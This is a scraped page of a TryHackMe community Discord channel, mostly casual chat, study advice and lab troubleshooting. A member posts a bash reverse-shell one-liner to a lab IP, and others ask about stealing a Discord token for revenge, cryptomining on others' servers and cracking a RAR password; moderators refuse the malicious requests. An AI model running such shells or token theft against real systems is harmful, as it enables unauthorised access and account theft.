#general

1 messages Β· Page 75 of 1

silver sky
#

Boing

sick lance
rapid merlin
#

Not more maths

#

hello guys, its a hacking server,

#

?

rapid merlin
#

β€œTryhackme”

#

xd

uncut cove
sage cedar
#

is it god hackin or bad hacking?

#

good*

sick lance
#

We're ethical hackers in here.

buoyant tree
sage cedar
rapid merlin
#

Does anyone know how to steal a discord token, or some other way besides sending the victim a file and having him download it?

buoyant tree
#

@sick lance

#

knows

sick lance
sage cedar
#

lol

rapid merlin
#

I really need to take revenge on one vile person

uncut cove
sick lance
rapid merlin
#

he is engaged in discrimination and provocation of people on the server

sand trench
#

only good ethical hacking

rapid merlin
#

Report him?

sick lance
#

Then you report it to your local authorities and Discord support.

sand trench
rapid merlin
#

Boing

sick lance
rapid merlin
#

Well, I really need to get its token, I looked everything up on github

thorny walrus
#

You really dont need to get it

#

you want it

#

what you really need is a lesson on ethics

sick lance
rapid merlin
#

what is your server for then?

#

what's up guys?

thorny walrus
rapid merlin
sand trench
#

go go power scrubz

rapid merlin
#

nah wait

rapid merlin
#

I'll go look for the hacker discord

#

gl guys

#

txh

#

thx

rapid merlin
#

ur just wasting ur time

thorny walrus
#

Oh no someone is provoking me I must commit the illegal 😭

rapid merlin
uncut cove
thorny walrus
sick lance
#

Ok guys, it's being dealt with. πŸ™‚

sand trench
#

let the moderators/scrubz handle it

slate forum
#

Take it easy

rapid merlin
sick lance
thorny walrus
sand trench
#

you are doing fine scrubz

slate forum
#

I like to rest my eyes

#

I am so tired

rapid merlin
#

go sleep

#

simple

slate forum
#

I guess that's the solution πŸ™

rapid merlin
#

best one ever

slate forum
#

Yes I hoped i could study a little

#

Thanks

rapid merlin
#

np

#

anyone wants any help/

#

?

sand trench
#

yes

#

how to port colourscheme from .Xresources to all apps supported by other colour schemes???

crude stump
#

According to my calculations

#

You gotta

#

Then

#

Do that

#

Finally do this

grizzled wing
#

i enjoy Kali's new wallpapers

crude stump
#

I can’t use any of there wall papers

#

Every time I try it fails

grizzled wing
#

bummer

primal python
#

Hi

grizzled wing
#

sample of 1 of each, try everything

crude stump
#

I would show the error but I’m not at my computer at the moment

grizzled wing
#

haha, i was just being funny with username

crude stump
#

Oh lmao

grizzled wing
#

waiting for Kali to finish upgrading

sand trench
#

@sick lance

grizzled wing
#

hi shadow

sand trench
#

ello veggies

sick lance
#

If you wish to post jobs on TryHackMe, can you please ping @umbral bay for the process please. πŸ™‚

grizzled wing
#

scrubz is blue, cool

sick lance
#

There is steps to take to be allowed to post to the #jobs-board

grizzled wing
#

haha

sick lance
#

That song will now be stuck in your head all day.

You're welcome!

grizzled wing
#

πŸ‘‚ πŸͺ±

sand trench
#

*reminds shadow of the tumblr post about a race of telepathic aliens that loves having humans around as you can ask them to think about a popular song and due to ear worms the humans will "play" that song for the aliens

grizzled wing
#

what benefit is there for the aliens to have human play a specific song?

#

social engineering example?

sand trench
#

when bored and wanna listen to music make human think of song and just listen to their thoughts

grizzled wing
#

okay

buoyant tree
#

aio bored

#

somebody recommend something fun to do

grizzled wing
#

make some hashes then hash or john crack them

sick lance
grizzled wing
#

find a password in rockyou

buoyant tree
sand trench
buoyant tree
grizzled wing
#

hacksmarter room, medium level

buoyant tree
#

hmm

#

Its friday already, didn't realize

sand trench
#

yeah probably more sane to do this new room

grizzled wing
#

yesterday was Pi day

sand trench
past sparrow
loud marlin
#

if you cat them will be faster to list them and learn

grizzled wing
#

another option is to find the emails in rockyou, there are a few

past sparrow
#

back as it was

sand trench
#

that re-arrangement game would be like a puzzle with 14.3 million pieces

#

fun

verbal musk
#

does any anyone have any advice for me

sick lance
past sparrow
sick lance
#

Run a scan, see what it picks up.

past sparrow
verbal musk
#

yeah I did that also used avast

sick lance
#

So why do you think you were hacked?

verbal musk
#

I'm just worried about my information being out there

verbal musk
#

I know im pretty not smart

sick lance
#

I wouldn't say that.

simple valve
#

I get those shady discord DMs all the time

sick lance
#

I've seen people who are knowledgable in this field get caught out.

simple valve
#

Almost downloaded one too πŸ’€

chilly veldt
#

Morning

past sparrow
#

Morning

devout palm
#

What is love

verbal musk
#

don't hurt me

past sparrow
verbal musk
#

idk is there anything I can do once they get all my personal info??

past sparrow
whole moss
#

Also what info you got? Bank, creditcard? If those then call the bank asap

sick lance
#

Really, if they already have info, nothing.

However it's hard to say what the malware actually done without diving in to it.

sand trench
verbal musk
twin ridgeBOT
#

Gave +1 Rep to @whole moss (current: #475 - 9)

past sparrow
#

But also could be that nothing could be done

verbal musk
#

I did have tax information saved on my computer

#

I'm hoping they didn't get to it tho

past sparrow
#

Did you run the malware with administrator privileges? Was the software actively running that contained tax information?

verbal musk
#

no

#

the tax file was a pdf

#

I think they only got my password info but alot of it is outdated

past sparrow
#

Oh. do you still have this software somewhere available that they sent you?

verbal musk
#

yea they linked me a site to it

#

Its in dms

#

I blocked them tho

sick lance
#

Probably best deleting the message so you don't click it again.

verbal musk
#

definitely

past sparrow
sick lance
#

Let's not ask members for malware.

past sparrow
#

Alright

#

Sorry bro, can't help you figure out what it does

verbal musk
#

the site itself seemed harmless

#

it was the downlaod on that site which was the malware lol

#

but yeah its cool I feel better

#

I don't think they hit anything that devestating

past sparrow
#

Best you can do now is report their domain for malicious activity, threat intelligence feeds will pick it up and may protect someone

verbal musk
#

like on discord

#

oh the site link?

past sparrow
#

Yeah, the website you downloaded it from

verbal musk
#

thanks for the advice everyone here seems pretty chill

sick lance
#

Which AV do you use?

verbal musk
sick lance
verbal musk
#

oh lmao

#

windows defender and malewarebytes

sick lance
#

Good choice, do you have Malware-bytes premuim?

verbal musk
#

nope

sick lance
#

Ah.

Free version is just as good.

sand trench
#

has to rely on clamav as can't find any other good av for linux

molten sky
#

clam is actually pretty solid tho

#

i use it to scan images from unkown machines

crude stump
#

question for the snort room it says to run a traffic generator shell. Do i just copy and paste the script into my terminal?

crude stump
#

oh yeah my b

hasty palm
#

altho complicated to me atm snort seems to be good stuff

past sparrow
past sparrow
shut hawk
#

Woah. This is incredible, Discord.

sick lance
#

That looks quite good

shut hawk
#

I'm in Dark mode

sick lance
#

Although, I like the tile now,

past sparrow
hasty palm
#

πŸ˜„

sand trench
#

shadow annoyed that discord does not support colourschemes like dracula or catppuccin or nord or rosepine

wild rose
#

psychopaths everywhere you go

sick lance
molten sky
#

why are you guys like this

sick lance
#

I like chaos.

molten sky
#

fair i guess

rapid merlin
shut hawk
#

cc @mossy river cool new discord feature

past sparrow
molten sky
#

it's kinda funny tbh

sick lance
#

Oh mate

molten sky
#

10 years ago everything was like that

sick lance
#

I can do that!

#

Lol

past sparrow
#

Yeah, I enjoyed the 10 years ago thing

sick lance
#

Can everybody? lol

past sparrow
#

now all my applications are bright / light mode

#

even my VS code is in light mode

molten sky
#

I will say --- it depends on where I am

#

The backdrop being bright or dark

sick lance
molten sky
#

that's what decides it

#

is my monitor against a dark wall? dark mode

rapid merlin
shut hawk
molten sky
#

is it in an office with bright lights behind it? light mode

rapid merlin
shut hawk
sick lance
molten sky
#

minimize contrast between the screen and backdrop

past sparrow
#

I am also that kind of guy that has always lights on when behind computer, I don't like to sit in the darkness

hasty palm
#

late night white sometimes hurts eyes, so dark mode in my case is easier to work with.

molten sky
sick lance
molten sky
#

otherwise the contrast gets old

rapid merlin
#

xd

past sparrow
hasty palm
#

this community is quite nice

rapid merlin
#

btw Scrubz you cant do it for any role higher than yours right?

past sparrow
sick lance
rapid merlin
#

oh wait thats strange

crude stump
sick lance
crude stump
#

pause

rapid merlin
#

it should be the same as editing roles, only the roles below your highest role. (if granted permission)

keen osprey
#

hello, how do i start my cyber attack

crude stump
#

wow

keen osprey
#

i want to be a good black hat

crude stump
#

slow down there

#

scrubs

sick lance
molten sky
#

lmao

rapid merlin
crude stump
#

its your time to shine baby

rapid merlin
#

Dont you mean white hat?

past sparrow
sick lance
#

Right?

crude stump
twin ridgeBOT
#

Gave +1 Rep to @sick lance (current: #2 - 2059)

keen osprey
simple valve
crude stump
#

5k aint bad

past sparrow
#

πŸ€”

past sparrow
rapid merlin
past sparrow
#

I wear what fits

hasty palm
#

i want to be good at defense ...blue ?

simple valve
#

Tommy hilfiger is nice too, their minimalistic styles are amazing

crude stump
#

that is blue yes

rapid merlin
molten sky
#

not everything is red and blue y'all

past sparrow
#

best defense is of......

keen osprey
wild rose
molten sky
#

there are things that are defensive that aren't blue

past sparrow
#

good yellow team

#

good green team

simple valve
molten sky
#

if you're adjusting firewall rules all day that's defensive but it's not blue teaming

crude stump
#

personally im more of a maroon hat typa guy

past sparrow
boreal gull
#

i think it kinda depends on what time period of THM

sick lance
#

@keen osprey this a community for ethical hacking, we don't teach any black hat material

boreal gull
#

when there was like 5 people, yes

molten sky
#

🐝

boreal gull
rapid merlin
#

🐝

devout palm
#

🐝

keen osprey
#

sometimes white hat and black hat optionally attack and defends

crude stump
rapid merlin
#

yo

crude stump
#

sup

rapid merlin
#

how do i join a machine if it doesnt give me the user and pass

#

im

past sparrow
boreal gull
past sparrow
#

Depends what kind of firewall rules are you adjusting, ingress, egress?

rapid merlin
#

mb

crude stump
#

oh wait nvm

boreal gull
crude stump
#

go to room help

boreal gull
#

its not meant to be

molten sky
boreal gull
#

but it is

#

that and DNS

molten sky
#

a square is a rectangle but a rectangle isn't always a square

devout palm
#

Is it always DNS?

molten sky
simple valve
#

exact same question

keen osprey
past sparrow
rapid merlin
rapid merlin
molten sky
rapid merlin
#

Were not playing call of duty here mate

molten sky
#

just like how bug bounty hunting is not red team

keen osprey
devout palm
simple valve
molten sky
#

it's become a huge misnomer

whole moss
past sparrow
rapid merlin
simple valve
#

Damn

keen osprey
#

many black hat is more skilled and go jail but the idea was while he got a free ticket to become cybersecurity consultant after served time in jail

molten sky
crude stump
wild rose
#

didn't he pass this year?

crude stump
#

yeah

wild rose
#

rip

past sparrow
crude stump
molten sky
devout palm
#

And doing bad things doesn't make you more skilled

simple valve
#

I think adversary threat emulation is a good alternative name to red teaming

past sparrow
molten sky
lone thistle
molten sky
#

just like how companies call bug hunting "penetration testing"

#

just cause they like the name doesn't mean it's correct

sick lance
crude stump
#

mans gonna come back to a hundred pings lmao

molten sky
#

i gots to goes

crude stump
#

any of yall had boba before

molten sky
#

don't get thrown in jail while i'm gone

#

or at least liveleak it

thorny walrus
crude stump
#

made my own but i undercooked em. now there rock hard in the middle lol

thorny walrus
#

damn

crude stump
#

like eating a rock

thorny walrus
#

i love eating rocks

crude stump
#

but with a squishy exterior

past sparrow
#

Okay yeah, you are right, looked up the definition @molten sky Apparently term blue team only applies to a mock situations

#

where there is active engagement

whole moss
#

Anyone into sff machine? I am planning on building one and I am thinking of going with fractal design terra but still open to other cases

lone thistle
lone thistle
#

could you link? πŸ™‚

crude stump
#

whats the difference between icmp and http

lone thistle
#

i am surprised NIST are putting it like that unless there's some context that i'm missing

keen osprey
past sparrow
devout palm
crude stump
rapid merlin
# lone thistle could you link? πŸ™‚

The group responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team).

CSRC Content Editor. (n.d.). blue team - Glossary | CSRC. https://csrc.nist.gov/glossary/term/blue_team

hasty palm
#

all kind of red flags puped up when i kliked that link

devout palm
past sparrow
sick lance
hasty palm
mossy river
keen osprey
#

is there a standard iq for become good ethical hacker?

mossy river
#

no

devout palm
#

I mean, why does it matter? lol. Call it whatever you want ~ This is for blue team discussion

mossy river
#

IQ does not equate to intelligence

lone thistle
# past sparrow Or you can go there from here https://csrc.nist.gov/glossary/term/blue_team

Ahh that is odd. Yeah I do see their definition. For the first time in my life, I disagree with NIST haha. IDK if the definition is old, or is specifically written to have some nuance, but blue teaming isn't just responding to mock incidents / responding to red team efforts. Sure, that's definitely an element, but again, there are roles where you are proactive - monitoring for attacks, incidents, etc, that may be from a legitimate threat and not just a mock scenario

past sparrow
#

I would 100% put IR into Blue Teaming, not just "IR"

#

along with other supportive roles

floral wing
#

At the end, they do mention a blue team can exist without a red team so idk y they worded like that in the beginning passage

past sparrow
#

I mean it makes sense they want to call it based on army terminology, because out in combat you don't also call enemy a red team

lone thistle
#

yup. Blue teaming has definitely expanded to be a bit more of an umbrella term. Maybe the definiiton there is thinking of it "traditionally", but absolutely a modern definition would include the above roles/responsibilities

past sparrow
#

that's where the terminology derives from but in IT it has already become de facto terms for goodies and baddies

hasty palm
#

ai version of blue hat

whole yew
devout palm
#

Ya call us baddies, huh?

hasty palm
mossy river
#

Similar to the hats

rapid merlin
whole yew
#

It's useful way to explain stuff to people without the understanding of what the various roles in cybersecurity are

past sparrow
whole yew
#

but other than that.... it has no meaning within the industry

past sparrow
floral wing
#

these terms r just used in the learning phase ig

whole yew
#

How does that do that, when someone doesn't understand enterprise security

#

it's just another flavor jargon term

past sparrow
#

oh in that case you just say "computer policeman"

#

convinces my parents

hasty palm
#

im gonna make some fried eggs

whole yew
#

but that's not what i do with my security engineer role

#

"computer policeman" is possibly even more useless unless you actually work as law enforcement and specialize in cybercrime

shut hawk
#

funniest strat ever

#

stun+shotgun

past sparrow
#

I guess it also depends how much they care about the details or is it just some general overview

lone thistle
#

yeah, I mean, in the industry you would expect someone to know what you do based on your role. Oh I'm a soc analyst, etc.

For the non-technical or as a general seperatation, the blue team is like a "oh I stop hackers", red team "I pretend to be a hacker to help organisations". Etc. It's very shallow I think intentionally

whole yew
#

I just tell people I work in IT

#

Because unless they also work in IT, whatever else I say is meaningless to them

past sparrow
#

I have learnt that saying it can be a headache because IT means coming to you with problems like "can you make me a web page"

whole yew
#

I certainly can help with that

wild rose
#

you know I just work for one of those ABC agencies. nothing too important.

whole yew
#

my consulting rate is $350/hr, $250/hr if we're friends

lone thistle
whole yew
#

that usually puts a stop to that

#

pay my rate, i don't care if you want me to sweep the floors

#

i've definitely had consulting customers burn a significant amount of hours have me babysitting an empty cage instead of deploying products

past sparrow
#

maybe better to say "computer security guard" then

shut hawk
#

juun, played season 2 of the finals?

devout palm
#

Better to not talk

whole yew
#

oh, the password security discussions i have with my family

clear jackal
#

"I work with computers"

whole yew
#

"don't use the same email/pass everywhere" "but then i have to remember things!"

umbral bay
clear jackal
#

And if anyone asks to help me fix stuff, "oh, it's my job to break them"

devout palm
#

"So you are a bad hacker?"

#

"Don't hack me plz"

past sparrow
#

so you want to go to jail?

simple valve
whole yew
#

Yeah, I have done that too. "But now I have to remember another password"

simple valve
#

Hahahahaha can’t argue with that

umbral bay
devout palm
#

Lol

past sparrow
wild rose
#

Monopoly... so you have choosen death

simple valve
fresh cobalt
simple valve
devout palm
#

"Can you hack x's instagram?"

fresh cobalt
#

When a room is in network state : resetting , how long does it take roughly ?

keen osprey
#

is there a way of ethical hacking to manipulate / hack server so they can mining on it

simple valve
devout palm
fresh cobalt
#

Ok I’m still waiting

sick lance
#

Ok, not all, most.

umbral bay
sick lance
devout palm
#

Shh

keen osprey
simple valve
#

Idk how to send without embeds on mobile

sick lance
devout palm
keen osprey
sick lance
crude stump
simple valve
umbral bay
simple valve
#

Planning to take only certs that THM has roles in kek kekw

past sparrow
sick lance
past sparrow
#

Oh, can I get GDAT on my profile?

crude stump
#

Idk can you

past sparrow
#

Asking the mods/admins

crude stump
#

Joke

#

Sorry

sick lance
#

I can't assign it yet, you'll need to wait for a mod to come, or tim if he ain't busy.

simple valve
#

Are SANS just courses and GIAC are their relevant certs?

simple valve
#

I always thought they were separate bodies

sick lance
simple valve
#

Like GIAC only prefers SANS courses but you can learn from other stuff

past sparrow
coarse moth
sick lance
past sparrow
#

He will challenge you to a duel soon for a role

#

be careful

sick lance
coarse moth
#

What is the cloud training section about? Is it included with the subscription?

sick lance
#

It Is not, due to the expense it's a separate purchase.

fresh cobalt
lone thistle
past sparrow
#

@lone thistle Hey, can I get GDAT role on my profile?

fresh cobalt
#

The DC has 10.200.64.101

lone thistle
#

I’m not a moderator alas, you’ll need to wait until one pops in

lone thistle
fresh cobalt
twin ridgeBOT
#

Gave +1 Rep to @lone thistle (current: #7 - 827)

crude stump
#

i cant with this

past sparrow
#

Oh okay, I will keep waiting till someone pops in then, thanks anyway

lone thistle
#

Yup:) the people on the right at the top of the server list in green are able to do it πŸ‘πŸΌ

They swing by fairly often so

raven moth
#

hello

#

i know it's a question that has already been made but when is dark theme coming?

lone thistle
# fresh cobalt The DC has 10.200.64.101

O.o. I can't even see that machine as existing, neither does anything else on x.64.x. How odd.

Can you leave the room by clicking on the grey cog, leave room, and re-join it after about 10 minutes?

raven moth
sand trench
raven moth
#

mhmh i see, thanks

umbral bay
past sparrow
serene wren
#

read books, have notes basically and note cards. Learning from objective based such as certifications and gamified things like Python Scripting from HackerRank. Most books have projects and those are the best ones but anyways just keep looking to obtain things and nonstop grind. Of course your not going to remember everything if your in multiple subjects at once, hence why some people get lower grades than others.

#

Differnet subjects have differnet techniques of learning, coding is obviously just reading and have logical thinking outside of having calculus in your arsenal.

rapid merlin
#

anyone here taking the evilginx course, please i'm having issues with gmail

shut hawk
#

Tried asking in their discord server?

#
  • Flashcards
  • Paraphrasing
  • Teaching others (or even just speaking out loud)
  • Applying what you learnt to a real scenario
blazing granite
crude stump
#

My speaker is broken. Anyone know the fix

fresh cobalt
#

Same , sometimes I don’t remember when I put my notes πŸ˜‰

chilly veldt
#

Just be relaxing at work trying to get through the night

grizzled crystal
#

Honestly the more you use what you study the more likely you are to remember it. I am very bad at memory stuff, so I prefer having a good reference that I can look at whenever I need a refresher

#

Figure out what works for you and do that

#

I like notes do I do notes

loud marlin
#

i think that madam webb is my no1 dumb ass movie ever

ashen wadi
#

The Champ Has A Name, And His Name Is Charles Oliveira!

grizzled crystal
#

I really want to watch madam webb, seems fun in a hatewatch sort of way

loud marlin
#

madam webb is movie with nothing of nothing. if i stare intro wall for 2h ill be more mussed =/.

fast inlet
#

any of you guys still use IRC channels? :P

sand trench
loud marlin
#

even that is more fun =/

sand trench
#

depending on a few factors yeah it can be fun

loud marlin
#

true. but movie is 1st class shit... just shit... no action, nothing that will make it worth of watching

fast inlet
#

is it normal that an nmap scan with all ports ( -p 1-65535 -T4 -A -v ) takes like 3 hours to complete? dumpsterfire

loud marlin
#

what command exactly?

fast inlet
#

what i posted there

#

nmap -p 1-65535 -T4 -A -v [ip]

loud marlin
#

on thm ?

fast inlet
#

i mean it found 2 open ports right away but then stuck on SYN Stealth Scan Timing for 1+ hour

#

45% done after 1 hour and half or so

#

i guess it's because all ports

loud marlin
#

there is no scan on thm that need that amount of time. and not sure to what room, but no need to run that long

whole yew
#

think about how much time it takes to get a response from an open port vs a closed/filtered port. What's the bottleneck? Now multiple that by the number of closed ports.

cerulean nest
#

anyone know about format strings and how to exploit em?

#

shoot me a dm

#

im goin braindead

fast inlet
cerulean nest
#

also how tf do yall have different role colord

whole yew
#

don't give bad information.

cerulean nest
#

colors

cerulean nest
#

when i scan things

whole yew
#

Timeout is configurable, default timeout is more than you think. It's not 100ms.

cerulean nest
#

for me it takes like less than 1s

loud marlin
#

if port is open then you prob get "instant" respond. for other state of ports you prob need more time. depend of how is set on system

#

and nmap by default, don't scan UDP ports. if you scan them then it can take ages

fast inlet
#

then yeah i suppose scanning all 65k takes ages

cerulean nest
#

why tf would u do that

fast inlet
#

with default settings anyway

whole yew
#

If you want an exhaustive check, that's what you have to do. Sometimes CTFs (and sometimes admins) will put services on high unprivileged ports just to make things harder to randomly discover.

cerulean nest
#

bruh

simple valve
#

if it works, it works

whole yew
#

Common offsets are multiple of 8k or 10k, but there is no 'best practice' or RFC that makes recommendations

cerulean nest
#

fr if i wanted a random port

#

96837

#

or 69696

#

lmao

simple valve
#

nah that wont work

#

bc of port boundary

whole yew
#

Neither of those ports are valid

cerulean nest
#

works with some applications

whole yew
#

65535 is the highest possible port value

cerulean nest
#

no u can have higher

loud marlin
#

nop

cerulean nest
#

autopsy binds to 99999

whole yew
#

Please link me the RFC

fast inlet
loud marlin
#

first think, do you need scann all of them?

whole yew
whole yew
loud marlin
cerulean nest
#

then do autopsy

#

and see what happens

whole yew
cerulean nest
#

bro im literally using it right now im on port 9999 localhost

loud marlin
#

9999 is not 99999

whole yew
#

Yea, 9999, not 99999 as you originally said. 9999 is an allowed port value, 99999 is not.

versed prairie
#

Does anyone have good wordlist recommandations?

cerulean nest
#

oh shi im dumb lmao

whole yew
#

For a specific room, @versed prairie or just in general?

whole yew
versed prairie
#

For the THM Rooms in general

whole yew
#

Most of the rooms that require a wordlist will tell you which one to use

versed prairie
simple valve
#

Seclists on Github

whole yew
twin ridgeBOT
#

Gave +1 Rep to @whole yew (current: #10 - 736)

crude stump
#

ugh i forgot who it was but someone recomended a video that explains ports

#

forgot who it was sadly

molten sky
#

wasn't me who sent the vid tho

crude stump
#

ikr

molten sky
crude stump
#

i remember it off the top of my head

molten sky
#

like i have wordlists half a TB in size that I multiply with permutations

crude stump
#

maybe they will speak and i will remember them

molten sky
#

you're not gonna want that for most things

#

not gonna use rockyou for directory fuzzing

#

many people make their own as well for certain targets

#

was it this one @crude stump

crude stump
#

damn your good

#

how did you find it so quick

molten sky
#

nothing special lol searched for "ports" in messages sent by you than just scrolled down a bit

crude stump
#

πŸ˜‚

#

i see

#

snort is always watching

molten sky
#

🐽

clear jackal
#

I haven't been able to sneeze for the past 3 hours

#

It's really annoying

crude stump
#

hm

#

why do you want to sneeze?

clear jackal
#

My body does

#

It gets started and then just stops right before I actually sneeze

crude stump
#

Damn

kindred bear
#

sniff pepper to induce a sneeze?

past sparrow
#

watch clips of someone yawning to induce yawn

heady nova
#

But you revealed our secret, @boreal scarab .... Sending Mauses to your haus

sand trench
#

meep meep this a comfy bed for sleep sloops to the beep boops while the moop moops

heady nova
sand trench
heady nova
heady nova
#

How many energy drinks in?

sand trench
#

also looked into some fun android stuffs

heady nova
heady nova
sand trench
heady nova
molten sky
#

don't know what you do?

#

you reverse!

heady nova
#

Pentesting, SoC, cloud security, Security Researcher

sand trench
heady nova
molten sky
simple valve
#

its ez pz for u

molten sky
#

i've been at yellow whatever (9?) forever it seems

#

yeah 9

heady nova
heady nova
simple valve
#

Hello rinzler

#

How have u been

heady nova
#

What does your name mean tho

sand trench
#

anyways time for that sweet sweet release of sleep meep beep sloop moop boop times

heady nova
simple valve
#

Its an acronym for word play in the common language in my country. its direct translation is β€œi’ve loved you ever since the first day i met you”

simple valve
heady nova
#

But gotta finish the intro to Asmx86-64 and intro to malware analysis first

#

Also shellcode and payloads

#

I'm going reverse Tier 2 -> Tier 1 -> Tier 0

#

How you been @simple valve ?

simple valve
heady nova
#

But you should try Tier 4

#

It's heaven

simple valve
#

I wish I had that, I hate reading long walls of text

#

The payments are super wild πŸ’€, i cant afford it right now

heady nova
heady nova
simple valve
#

But Im doing CRTO rn and just passed my ASCP exam

simple valve
heady nova
#

You can accumulate 1600 cubes by doing till Tier 2

simple valve
#

Darn tax eating my paycheck

heady nova
heady nova
lone thistle
simple valve
twin ridgeBOT
#

Gave +1 Rep to @heady nova (current: #209 - 25)

simple valve
#

Hope to see you with a certification soon, CPTS perhaps πŸ‘€

simple valve
crude stump
#

Oh my

heady nova
lone thistle
crude stump
#

It looks interesting especially because it’s by Cisco

heady nova
#

Just happy that finally I'll have something solid on my resume

simple valve
#

Good luck! The badge looks nice on the HTB Discord since its beside your name

heady nova
simple valve
#

I mean alongside other developers

heady nova
crude stump
#

Good luck

lone thistle
heady nova
twin ridgeBOT
#

Gave +1 Rep to @crude stump (current: #239 - 21)

simple valve
#

Salute to all OSS devs 🫑

heady nova
molten sky
# boreal scarab

idk what this one is from but one of my favourite things in battlefield used to be sniping jets and helicopters out of the air with tanks on the other side of the map

past sparrow
molten sky
#

pisses people off to no end

#

hilarious

heady nova
twin ridgeBOT
#

Gave +1 Rep to @past sparrow (current: #322 - 14)

crude stump
molten sky
simple valve
#

#room-help I think is a better place to ask your question

#

You’ll get much more streamlined help

crude stump
molten sky
#

wot was the alternative

#

haven't played that in years

crude stump
#

Ikr

molten sky
#

it used to be good actually

crude stump
#

I downloaded it along time ago but I never even played it

#

Idk why I even did

narrow dove
#

has anyone tried the new room (hack-smarter-security)?

simple valve
#

if you want to find others that are currently doing/have done it.

chilly veldt
#

I had a blessed breakfast

#

Got a gosh dang durum

rapid merlin
#

Doing a ctf
Directory traversal found
Can't figure out which file to retrieve from the server
How can I enlist dirs content

#

I have etc passed
Never got to exploit it

#

Any ideas?

fresh cobalt
rapid merlin
fresh cobalt
#

If you have etc/shadow , unshadow it with etc/passwd and use John

simple valve
rapid merlin
#

I think I have it

simple valve
#

Oh okie, I think you’ll better have help asking in their respective forums and whatnot.

rapid merlin
#

How to bypass :// for php wrappers
I tried encoding
Url url hex
Any other way around?

coarse moth
#

#!/bin/bash

bash -i >& /dev/tcp/10.10.32.110/8080 0>&1

is this command good for a reverse shell?

coarse moth
sinful thunder
#

It’s a possible reverse shell to 8080/TCP on said IP but it will depend on your environment

#

For most scenarios; yes it’ll work. It will most definitely be caught by something like SecurityOnion

coarse moth
sinful thunder
#

In terms of a help desk; Make sure you have a VPN connection to THM infrastructure.
In terms of Offsec; Make sure you’re exploiting it properly. (IE: cron jobs are running, no firewall rules blocking that outgoing port, etc)

coarse moth
twin ridgeBOT
#

Gave +1 Rep to @sinful thunder (current: #2025 - 1)

hardy forum
#

Hey guys

#

Thank you for having me here

#

Please I have a question. Am new to IT/ cybersecurity am a newbie. I want to start my career in cybersecurity. The Tryhackme is it a good place to start?

#

Thank you

fresh cobalt
twin ridgeBOT
#

Gave +1 Rep to @fresh cobalt (current: #2025 - 1)

hardy forum
twin ridgeBOT
#

Gave +1 Rep to @blazing granite (current: #139 - 48)

molten sky
#

mods are asleep

#

new seytonic vid dropped

simple valve
#

Hi @graceful thistle !!

#

I have not seen you around in quite a while

#

How goes it in NZ (?)

molten sky
#

i knew dolphin would react/respond like right away

#

good at summoning y'all

buoyant tree
#

I don't see anything

blazing granite
#

@buoyant tree Sup!!!

buoyant tree
#

listening to a cover which I am not even sure falls into a proper genre

blazing granite
#

I'm drinking 🍺

gray sonnet
#

Hi Drinking, I'm Vain πŸ‘‹

blazing granite
coarse moth
#

which is better attachbox or open vpn

#

to complete machines

gray sonnet
blazing granite
buoyant tree
#

I like attackbox more since I don't have to spin up a VM every timei

gray sonnet
#

Hey, anyone here plays phasmophobia?

blazing granite
#

I don't play with phobias πŸ˜‚

buoyant tree
#

Everybody here will be triggered

blazing granite
#

much worse πŸ˜›

buoyant tree
#

death sentence

#

star trek better tho

blissful axle
#

Hi guys, I am looking for a vulnerability in Version 5 of rar for open a file with a password, can anyone help me in that?

blissful axle
#

Find a vulnerability in that version then exploit it then open the file πŸ‘πŸ™‚

blissful axle
blazing granite
blissful axle
blazing granite
weak plaza
#

Guys i was doing eternalblue room on thm. i was able to exploit but cannot create a session. i am getting this error. Any help??
[] 10.10.150.14:445 - Sending egg to corrupted connection.
[
] 10.10.150.14:445 - Triggering free of corrupted buffer.
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

boreal gull
#

@grizzled crystal may i DM? Someone i know is starting an A11Y cyber security podcast and i am helping them find other people to talk on it

brisk tree
#

Morning

weak plaza
past sparrow
#

if still not working after reasonable attempts - might not be the correct exploit

weak plaza
weak plaza
sick lance
past sparrow
#

good morning

#

Looked at Locked Shields lineup for our team, I am so happy I get to be in Windows team ...

#

erveryone else I know "Uncertain" πŸ₯²

#

I don't mind it though, glad they knew what I wanted to do in advance

#

get to see my old colleague as well so thats a win

#

Not so sure its a lonely path

sick lance
#

Depends on the questions your asking, I suppose.

past sparrow
#

line is determined by if you ask for sake of asking or you geniuenly want to know

#

Though often time the answer can be "you can look it up in 2 minutes from google"

finite edge
#

I have a question

sick lance
#

Depends on the question, we may, or may not have an answer.

finite edge
#

Do I need working knowledge of any programming languages before starting my career in cybersecurity?

past sparrow
#

No

finite edge
#

So I can start without any knowledge of programming languages?

past sparrow
#

Yes

finite edge
#

Companies accept such candidates who has no knowledge in programming languages if they were to apply for any position related to cybersecurity?

past sparrow
#

I think you should elaborate your questions tad bit more, or narrow them down, because I am answering for the whole scope of cybersecurity now. Including compliance.

#

So, yes, to your latest question

finite edge
#

All right, let's say I want to become a penetration tester for a company. Will I require any working knowledge of programming languages?

past sparrow
finite edge
past sparrow
#

Most penetration testing jobs on the market are for web apps and phone apps, its not often someone wants full domain penetration test

finite edge
twin ridgeBOT
#

Gave +1 Rep to @past sparrow (current: #307 - 15)

past sparrow
#

No problem and good luck

#

Quite possibly

#

Either that or something similar likely will be there

shell nova
#

Very possibly I'm afraid

exotic lark
#

guys, how can i verify my thm account here?

sharp citrusBOT
exotic lark
#

ty

graceful thistle
ashen wadi
#

Every SOC center is different,for example in mine we use ELK only for network,and for other things we have some inhouse made SIEM. Usually people go with ELK,Splunk,Qradar, Azure Sentinel..

rapid merlin
#

Anyone has a gaming laptop?

past sparrow
rapid merlin
#

I work for an MSP, and it is pretty common to do penetration tests

past sparrow
past sparrow
#

I may be wrong though and our company just gets more web stuff than any other things

simple valve
#

I'm from Asia market and am in house tester for our web apps and APIs

past sparrow
#

web and phone apps

simple valve
#

if you dont mind me asking

ashen wadi
past sparrow
#

Are developers not good or our pentesters very good, that I don't know

mint palm
#

